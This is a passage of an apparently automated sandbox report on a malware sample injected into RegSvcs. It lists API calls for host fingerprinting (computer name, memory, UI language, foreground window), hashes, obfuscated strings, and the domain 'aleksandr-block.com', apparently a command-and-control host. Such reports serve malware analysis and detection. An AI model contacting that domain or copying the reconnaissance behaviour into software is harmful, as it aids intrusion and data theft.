                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                • String ID: [
                                                                                • API String ID: 3960555810-784033777
                                                                                • Opcode ID: 7f03625f0f234d9311ea92f0fff066ed3930a5f7d6642aec2e7e48191c1adaaa
                                                                                • Instruction ID: 5e94c3e6392dfdb4fe2f95aaa4212b5eb687c90d40dd3ea95689f2bdc07e382e
                                                                                • Opcode Fuzzy Hash: 7f03625f0f234d9311ea92f0fff066ed3930a5f7d6642aec2e7e48191c1adaaa
                                                                                • Instruction Fuzzy Hash: 25B1277050C3D28AD739CF2AD4607ABBFD0AF96304F5849AEC4C98B382D7794506CB56
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $$'P
                                                                                • API String ID: 0-3739442336
                                                                                • Opcode ID: cf9b03eddff39dabedfc0ba2780abb16924720ce44bfe62193036bbb287e3045
                                                                                • Instruction ID: 250af7dd5073492f913882752ade9a5b6bb6065925059aa04dfc985763a53cd2
                                                                                • Opcode Fuzzy Hash: cf9b03eddff39dabedfc0ba2780abb16924720ce44bfe62193036bbb287e3045
                                                                                • Instruction Fuzzy Hash: 07B120B5505B008FD334CF2AD891B97BBF1BB95314F148A2CD5AA8BA90DB75B406CF84
                                                                                APIs
                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042EB77
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                • String ID:
                                                                                • API String ID: 3960555810-0
                                                                                • Opcode ID: 67358821e667b824251135697af9d6f6c0b97ee35f9266ecd0359f3eee7304f3
                                                                                • Instruction ID: 76a10fbfb8979de461f9c11c17174af944d07184230f26758513f9810c545aaf
                                                                                • Opcode Fuzzy Hash: 67358821e667b824251135697af9d6f6c0b97ee35f9266ecd0359f3eee7304f3
                                                                                • Instruction Fuzzy Hash: EAA1157060C3918BD739CF2AD4607EBBFD0AF96304F5889AEC4C98B392D77945058B5A
                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(00442ECD,?,00000018,?,?,00000018,?,?,?), ref: 0043FD1E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: qz{8
                                                                                • API String ID: 0-1332276672
                                                                                • Opcode ID: bcd88d49738dc51f3c2d1478d06964edcd2205efb652cf0ee7cfccec4e54270a
                                                                                • Instruction ID: 8a47e477f9ea8c9a62da4d2038802ea537a173497f7d635a8f510b87fbe218ca
                                                                                • Opcode Fuzzy Hash: bcd88d49738dc51f3c2d1478d06964edcd2205efb652cf0ee7cfccec4e54270a
                                                                                • Instruction Fuzzy Hash: E4515E35B057105BD7209E29D88172BB7D1ABC9738F29972DECA8673D1E3349C0287D5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: @
                                                                                • API String ID: 2994545307-2766056989
                                                                                • Opcode ID: bb3244f89264dae0eedccc48ea3249780dae7d5a8488c4838dcc95fedf7f96bb
                                                                                • Instruction ID: 604fb159ac4a9ce657edd39fe3aca4406f262885f72d090489293974a6e9e70b
                                                                                • Opcode Fuzzy Hash: bb3244f89264dae0eedccc48ea3249780dae7d5a8488c4838dcc95fedf7f96bb
                                                                                • Instruction Fuzzy Hash: 3621D4755043049FD314DF08D8C167BB7F5EB86324F249A2DF968473A0D375984D8B9A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: f8d6b63512e8766a6f7a1fef200e15a03f1bd5b6045c5a7b5f870415da9299bd
                                                                                • Instruction ID: 5d9cf6149d12638203344b5f73ba6df9c60d3e5b1c8a76498b2e7280274bb1d1
                                                                                • Opcode Fuzzy Hash: f8d6b63512e8766a6f7a1fef200e15a03f1bd5b6045c5a7b5f870415da9299bd
                                                                                • Instruction Fuzzy Hash: B4715C71B083245BD7109F25EC91A3BB7E5DF86318F98893EE8854B382E33D9C058799
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9b0700ae82778aa9d4f9d0e781d3d2541164e8ace227691c7232703d55d16cbf
                                                                                • Instruction ID: 9fa7ab4002a41123cf54beea95e1f95dedbf20a3aa8f7df36aa68369611d644e
                                                                                • Opcode Fuzzy Hash: 9b0700ae82778aa9d4f9d0e781d3d2541164e8ace227691c7232703d55d16cbf
                                                                                • Instruction Fuzzy Hash: A82149A1A242108BC7249F29DC5253BBBF1EF96364F99862DE081DB395F33CD800C35A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f319d67805dceea3de0b5f768977ed6000cc649301a0af37d96768635167819f
                                                                                • Instruction ID: 26f8e3a5bcad9dec925031162f9977a2434f5784bea535da3da624853f55d13a
                                                                                • Opcode Fuzzy Hash: f319d67805dceea3de0b5f768977ed6000cc649301a0af37d96768635167819f
                                                                                • Instruction Fuzzy Hash: 9A21FF313893409FC7048F68D8D17AEFBE1EBC6314F05497DE196A3382D6B894069B0A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bb7bebc6e5da23d2039601f6ccc883706f8ecb15145e02b1af65aacb3f0a5d22
                                                                                • Instruction ID: f2a58080112dea700b2392337a5e0c2e2a3fc57ad19095bda6f71d252ba2d165
                                                                                • Opcode Fuzzy Hash: bb7bebc6e5da23d2039601f6ccc883706f8ecb15145e02b1af65aacb3f0a5d22
                                                                                • Instruction Fuzzy Hash: 8A01A7B460D741EFC318CF29DC6162BB6E5AB86700F14D93CE095A7265DB30E505CB4A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 558 40de1e-40de52 call 436320 call 4097e0 CoUninitialize 563 40de60-40de87 558->563 563->563 564 40de89-40de9f 563->564 565 40dea0-40dec6 564->565 565->565 566 40dec8-40df25 565->566 567 40df30-40df73 566->567 567->567 568 40df75-40df86 567->568 569 40df88-40df96 568->569 570 40dfab-40dfb3 568->570 571 40dfa0-40dfa9 569->571 572 40dfb5-40dfbf 570->572 573 40dfcd 570->573 571->570 571->571 574 40dfc0-40dfc9 572->574 575 40dfd4-40dfe1 573->575 574->574 576 40dfcb 574->576 577 40dfe3-40dfea 575->577 578 40dffb-40e003 575->578 576->575 579 40dff0-40dff9 577->579 580 40e005-40e006 578->580 581 40e01b-40e025 578->581 579->578 579->579 582 40e010-40e019 580->582 583 40e027-40e02b 581->583 584 40e03b-40e047 581->584 582->581 582->582 585 40e030-40e039 583->585 586 40e061-40e17f 584->586 587 40e049-40e04b 584->587 585->584 585->585 589 40e180-40e1a2 586->589 588 40e050-40e05d 587->588 588->588 590 40e05f 588->590 589->589 591 40e1a4-40e1bf 589->591 590->586 592 40e1c0-40e1e7 591->592 592->592 593 40e1e9-40e213 call 40b6a0 592->593 595 40e218-40e239 593->595
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: Uninitialize
                                                                                • String ID: 45*$4FFp$KH(`$N$W^ON$YZ,F$[<X2$aleksandr-block.com$zr
                                                                                • API String ID: 3861434553-1313545833
                                                                                • Opcode ID: c6ea8ddb5f1b8a46b9ddb9424fc61477f8a98903492f8408f539fa12a29fae86
                                                                                • Instruction ID: ddca04a3b4ed3e7cf71d585f5829f1aeef5847c078786ae6476367993996384b
                                                                                • Opcode Fuzzy Hash: c6ea8ddb5f1b8a46b9ddb9424fc61477f8a98903492f8408f539fa12a29fae86
                                                                                • Instruction Fuzzy Hash: 72A10FB45093D18ED734CF26C5947EBBFE1AF93304F18496EC4D96B282C679050A8B9B

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 800 42e0e3-42e0f1 801 42e0f3-42e0fa 800->801 802 42e10b-42e161 call 4415f0 800->802 803 42e100-42e109 801->803 808 42e170-42e1d1 802->808 803->802 803->803 808->808 809 42e1d3-42e1dd 808->809 810 42e1df-42e1ea 809->810 811 42e1fd 809->811 813 42e1f0-42e1f9 810->813 812 42e201-42e23c GetComputerNameExA 811->812 815 42e243 812->815 813->813 814 42e1fb 813->814 814->812 815->815
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?), ref: 0042E119
                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042E21A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: ComputerFreeLibraryName
                                                                                • String ID: Mw
                                                                                • API String ID: 2904949787-2910736759
                                                                                • Opcode ID: ad6d37407eaf66c5865a47cf023656043b858ff5e7d6d8b13bb4dd900386f98b
                                                                                • Instruction ID: e9d609a63258c5784c381411e9d7cc2200530e3a4b07fbf007865332cc1b6aad
                                                                                • Opcode Fuzzy Hash: ad6d37407eaf66c5865a47cf023656043b858ff5e7d6d8b13bb4dd900386f98b
                                                                                • Instruction Fuzzy Hash: 053129326483A08BD7358F3998847E7BBE0EB96305F48467ED8CDA7291D7794806C792

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 827 42e0e1-42e161 call 4415f0 832 42e170-42e1d1 827->832 832->832 833 42e1d3-42e1dd 832->833 834 42e1df-42e1ea 833->834 835 42e1fd 833->835 837 42e1f0-42e1f9 834->837 836 42e201-42e23c GetComputerNameExA 835->836 839 42e243 836->839 837->837 838 42e1fb 837->838 838->836 839->839
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?), ref: 0042E119
                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042E21A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: ComputerFreeLibraryName
                                                                                • String ID: Mw
                                                                                • API String ID: 2904949787-2910736759
                                                                                • Opcode ID: 9d7b1d6b9d9a8eca1b51d83a657aba0d57305fc84ddbb6153957d88797b9adb1
                                                                                • Instruction ID: 4e07e5142bf27db904b1b90a512ce8b3a58ae695ad4665973910c49be3074c7b
                                                                                • Opcode Fuzzy Hash: 9d7b1d6b9d9a8eca1b51d83a657aba0d57305fc84ddbb6153957d88797b9adb1
                                                                                • Instruction Fuzzy Hash: 38218A3264836087D7348F359C807EB7BE0EB86304F48467ED889AB291C7394C028792
                                                                                APIs
                                                                                • GetComputerNameExA.KERNELBASE(00000005,$zHa,00000100), ref: 0042FA44
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: ComputerName
                                                                                • String ID: $zHa
                                                                                • API String ID: 3545744682-1432854064
                                                                                • Opcode ID: bc6777cfc484f4a3c740225f5b45fe02c5876dd073b81dabbde2235a3ef46995
                                                                                • Instruction ID: 007c472596e221bb46d7e75f8c6a96d6a5c7963fde98443833c381d4f14149ac
                                                                                • Opcode Fuzzy Hash: bc6777cfc484f4a3c740225f5b45fe02c5876dd073b81dabbde2235a3ef46995
                                                                                • Instruction Fuzzy Hash: A6215772A596A14BD73CCF34C8653ABB7E1EB85310F19857E89CA97380CB785805CB82
                                                                                APIs
                                                                                • GetUserDefaultUILanguage.KERNELBASE ref: 00439091
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: DefaultLanguageUser
                                                                                • String ID: Dv{x
                                                                                • API String ID: 95929093-4149960103
                                                                                • Opcode ID: 6c9cbfcb65a08d5cb1a996a5a98ef89e80667baa4b8eb0579d8837e5f80c4790
                                                                                • Instruction ID: 34eb4c8e9c1889207685da6326566da12b062bc8a59a7589b5c1d2c8763f04f6
                                                                                • Opcode Fuzzy Hash: 6c9cbfcb65a08d5cb1a996a5a98ef89e80667baa4b8eb0579d8837e5f80c4790
                                                                                • Instruction Fuzzy Hash: 20112731A0A1948FEB18CB38CC94B997BB2AF9A300F1881EDC94E97390DA355D45CF11
                                                                                APIs
                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042E21A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: ComputerName
                                                                                • String ID:
                                                                                • API String ID: 3545744682-0
                                                                                • Opcode ID: e28a404809dc2c27f79d6333fb0c10cff3ff816b03cb9ec7a3b7b8f71d97a8cf
                                                                                • Instruction ID: d9e091aa906868c9eb053a5388f698ffddd4bf5e076f54f0e781b123d8cdbaa0
                                                                                • Opcode Fuzzy Hash: e28a404809dc2c27f79d6333fb0c10cff3ff816b03cb9ec7a3b7b8f71d97a8cf
                                                                                • Instruction Fuzzy Hash: DD214C3265836047D734CB359C807E77BE0EB86315F49467EDC89AB391D6794C068792
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 0043FF55
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: ForegroundWindow
                                                                                • String ID:
                                                                                • API String ID: 2020703349-0
                                                                                • Opcode ID: 16afca867b0e680a57db6c56a49a54c2592310970568051fcf881583c76dad0c
                                                                                • Instruction ID: 1c1f3dc44c5ae7dc7caa8d600c57aaa1321de3a1b71d1d0007c67adbb3cc8cb0
                                                                                • Opcode Fuzzy Hash: 16afca867b0e680a57db6c56a49a54c2592310970568051fcf881583c76dad0c
                                                                                • Instruction Fuzzy Hash: 4701263AB551414B974CCB34EC924EB77E3E792315B48A83ED152C33A1EE38D4098B0A
                                                                                APIs
                                                                                • RtlReAllocateHeap.NTDLL(?,00000000), ref: 0043FCC0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 8f7a576a644c72263d4f8468adaf5b141446d25f7ecc8601963828de74b426b7
                                                                                • Instruction ID: af8cdebbac548c628585b1a1278c66346c3195d30f98a2260abe551c9b2879ca
                                                                                • Opcode Fuzzy Hash: 8f7a576a644c72263d4f8468adaf5b141446d25f7ecc8601963828de74b426b7
                                                                                • Instruction Fuzzy Hash: 71F0E576815211EBD2002F26BD06A1B3A78EFCA768F015876F400A61A5E739D802C5DA
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: BlanketProxy
                                                                                • String ID:
                                                                                • API String ID: 3890896728-0
                                                                                • Opcode ID: 604e50b64b196f50df65a7806b51480d98a324279fd4725d15acbb073fd2bee7
                                                                                • Instruction ID: 0c557ba6974eabaec60999c9f7a8d7657af349d6b6155683b2f99b263904d6ff
                                                                                • Opcode Fuzzy Hash: 604e50b64b196f50df65a7806b51480d98a324279fd4725d15acbb073fd2bee7
                                                                                • Instruction Fuzzy Hash: 8F01ECB8605701CFD304DF64D498B56BBF1FB89304F10885DE5958B350C7769948CF82
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: BlanketProxy
                                                                                • String ID:
                                                                                • API String ID: 3890896728-0
                                                                                • Opcode ID: 138d42a456181d8e723b18e52baaca6003121fb282e3c4b603724a0f86ea579e
                                                                                • Instruction ID: c515839c574f403de4f41ffb91265ad2b8511d28c4073785b4701dcd883de871
                                                                                • Opcode Fuzzy Hash: 138d42a456181d8e723b18e52baaca6003121fb282e3c4b603724a0f86ea579e
                                                                                • Instruction Fuzzy Hash: 93F09EB4508701CFE311DF24D1A471ABBF4FB85308F11885CE5958B390C7769949CF82
                                                                                APIs
                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CAD3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize
                                                                                • String ID:
                                                                                • API String ID: 2538663250-0
                                                                                • Opcode ID: 53281d4fb6c8f560b1a7d5334f2b4776c18066f718c7f87dd48690797b366cb8
                                                                                • Instruction ID: 088116dd6bfe9997d9702f82d158d78b0d274b6201ac13d2327d95c3e7fdeef5
                                                                                • Opcode Fuzzy Hash: 53281d4fb6c8f560b1a7d5334f2b4776c18066f718c7f87dd48690797b366cb8
                                                                                • Instruction Fuzzy Hash: D6E02B36BD410817D304571CFC07F46362A93C3729F989335B551D2BDADD399905C29A
                                                                                APIs
                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CB10
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeSecurity
                                                                                • String ID:
                                                                                • API String ID: 640775948-0
                                                                                • Opcode ID: fae2b4ef14b40100722e6b1385ca334babadcaf0a1dea3a7a22989337f6dfc94
                                                                                • Instruction ID: dbfd3db00dccbd658f76e0afe681c16c9087ac9d599db6cc1580d8e2bd5be504
                                                                                • Opcode Fuzzy Hash: fae2b4ef14b40100722e6b1385ca334babadcaf0a1dea3a7a22989337f6dfc94
                                                                                • Instruction Fuzzy Hash: 9CD0C9383C8340BBF6258B08EC53F1432506706F21F300A24B363FE6E0CAD072028A0D
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(?,00000000,00F17650,00414620,00000000), ref: 0043E550
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: 239918f78c9f47c590e4119ee476ed02e9baf902ff5a2db6c4b0f1e314cded60
                                                                                • Instruction ID: bc1c1f1268a57b82eea8d6520593c5a24597083c1513a26da4f791fd7a00ff56
                                                                                • Opcode Fuzzy Hash: 239918f78c9f47c590e4119ee476ed02e9baf902ff5a2db6c4b0f1e314cded60
                                                                                • Instruction Fuzzy Hash: ABD0C931805522EBCA103B18BC06BD73A98EF4A3A1F0708A2F404AA075C764DCD1CAD8
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(?,00000000,C9C82FCE,A16C1943,00408A15,C9C82FCE), ref: 0043E520
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 7ed48fcc3211810d2bf55372ce7140ad68aad3c79546a2b5dfb2280ebcf1b8d7
                                                                                • Instruction ID: 1c3d676bf31bbb2ed4fd66d857f325aee7a173f4f8010ab51c870f528ceae898
                                                                                • Opcode Fuzzy Hash: 7ed48fcc3211810d2bf55372ce7140ad68aad3c79546a2b5dfb2280ebcf1b8d7
                                                                                • Instruction Fuzzy Hash: AAC04C31445120AAD9142B15EC05BC63A58EF453A5F020496B004A60718660ACC18698
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: P*V$ TuZ$(\*b$*@2F$30$=L)R$E0T6$E4A:$I<JB$N$Z,[2$a8\>$u$q*$w(n.$?9
                                                                                • API String ID: 0-1979296878
                                                                                • Opcode ID: 489b6de9202c373bb95070ab42b7b1f77723d0f61a6c241868b3332100412a05
                                                                                • Instruction ID: 2b8434fb23be42c2229ebff7041f95e6f9335be2fa966f6059b81d381bcb10d9
                                                                                • Opcode Fuzzy Hash: 489b6de9202c373bb95070ab42b7b1f77723d0f61a6c241868b3332100412a05
                                                                                • Instruction Fuzzy Hash: B57250B560C3908AD334CF20D842B9FBBF2EB92304F408D2DD5D9AB252D6758946CB97
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00428BED
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00428D1D
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00428DC3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: '0 6$O"8+$kC7+$G-A
                                                                                • API String ID: 237503144-151028999
                                                                                • Opcode ID: 47bac9d48446258787c076326c11028b097225ca561a3b7edf1add11471e0e69
                                                                                • Instruction ID: 20951de620bd2d918c2d75d64f094f946adcd2781b59edb95cd00fc00426b2ba
                                                                                • Opcode Fuzzy Hash: 47bac9d48446258787c076326c11028b097225ca561a3b7edf1add11471e0e69
                                                                                • Instruction Fuzzy Hash: 5C42CB75608341DFE314CF25E88072BBBE2FF8A314F18896DE5958B2A1DB759C41CB4A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2X+-$93SE$9;"=$Cf4/$EVFt$IIF@$Y$ZNGG$^;:$q;:
                                                                                • API String ID: 0-1314670452
                                                                                • Opcode ID: 7b458d550250e0f052648921b97fbc93dd4c06b2e262ff0037e145e505ab822c
                                                                                • Instruction ID: 017dd21b7c1423e257ddf19562dbb1ef7023a09f108efc3fe981e4995990c983
                                                                                • Opcode Fuzzy Hash: 7b458d550250e0f052648921b97fbc93dd4c06b2e262ff0037e145e505ab822c
                                                                                • Instruction Fuzzy Hash: 8071AEB490D3E08AD7358F2994A03EBBBE1AFD7304F588A5DC4D91B341CBB944058B97
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL ref: 00411121
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: ($R$d$o$q$q
                                                                                • API String ID: 237503144-1691954368
                                                                                • Opcode ID: 073a64fe9837ac3120a454bc136193d83e9edf410115716ed01ccf3c7377896a
                                                                                • Instruction ID: 4b5a347bdde5173eb79e7477f591f974fd83916709c899c05682b225eed660d0
                                                                                • Opcode Fuzzy Hash: 073a64fe9837ac3120a454bc136193d83e9edf410115716ed01ccf3c7377896a
                                                                                • Instruction Fuzzy Hash: 3612A47550C7808BD3249F38C4917EFBBE1AFC9364F184A2EE5D987392D67884468B47
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?), ref: 00419477
                                                                                • FreeLibrary.KERNEL32(?), ref: 004194B9
                                                                                  • Part of subcall function 0043FCF0: LdrInitializeThunk.NTDLL(00442ECD,?,00000018,?,?,00000018,?,?,?), ref: 0043FD1E
